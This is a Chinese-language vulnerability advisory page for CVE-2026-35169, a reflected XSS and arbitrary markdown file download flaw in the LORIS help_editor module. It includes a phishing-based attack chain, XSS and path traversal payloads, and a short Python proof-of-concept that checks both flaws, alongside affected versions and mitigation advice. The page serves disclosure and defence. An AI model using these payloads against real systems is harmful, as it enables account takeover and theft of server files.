CVE-2026-35169 CVSS 8.7 高危

CVE-2026-35169 LORIS跨站脚本与文件下载漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35169

漏洞类型

XSS, 任意文件下载

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

LORIS

漏洞概述

LORIS是一个用于神经影像学研究的Web应用程序。在27.0.3和28.0.1版本之前，其help_editor模块未能正确清理用户提供的变量。这可能导致反射型XSS攻击，攻击者诱导用户点击恶意链接即可触发。此外，该漏洞还允许攻击者下载服务器上的任意markdown文件。

技术细节

该漏洞存在于LORIS的help_editor模块中，由于对用户输入的变量缺乏足够的净化处理，攻击者可以构造恶意URL。当受害者被诱骗访问该链接时，攻击者注入的JavaScript脚本会在受害者浏览器中执行，导致反射型跨站脚本攻击。这种攻击可用于窃取会话凭证或执行未授权操作。同时，利用相同的输入向量，攻击者可以通过操纵参数请求服务器上的任意Markdown文件，导致敏感信息泄露。漏洞利用需要低权限用户交互，攻击复杂度较低。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标正在使用受影响版本的LORIS系统。

STEP 2

2. 制造武器

攻击者构造包含恶意脚本的URL或指定服务器文件路径的URL。

STEP 3

3. 投递

通过钓鱼邮件或社交工程，诱导具有低权限的用户点击构造的恶意链接。

STEP 4

4. 利用

用户点击链接，浏览器执行恶意脚本（XSS）或下载服务器文件。

STEP 5

5. 后渗透

攻击者利用窃取的Session Token接管账户，或分析下载的文件获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-35169 PoC Example
# 1. Reflected XSS Payload
# Attacker sends this link to a victim:
# https://target-loris.com/help_editor/?file=<script>alert(document.cookie)</script>

# 2. Arbitrary Markdown File Download
# Attacker requests a sensitive file (assuming sensitive.md exists):
# https://target-loris.com/help_editor?file=../../../../path/to/sensitive.md

import requests

target_url = "https://target-loris.com/help_editor"
xss_payload = "<img src=x onerror=alert('XSS')>"
file_payload = "../../../../config/database.md"

# Verify XSS
response = requests.get(f"{target_url}?file={xss_payload}")
if xss_payload in response.text:
    print("XSS Vulnerability Confirmed")

# Verify File Download
response = requests.get(f"{target_url}?file={file_payload}")
if "sensitive_content" in response.text:
    print("Arbitrary File Download Confirmed")

影响范围

LORIS < 27.0.3

LORIS >= 28.0.0, < 28.0.1

防御指南

临时缓解措施

在应用补丁前，建议部署Web应用防火墙（WAF）以拦截针对help_editor模块的恶意参数请求，并限制非管理员用户对该模块的访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表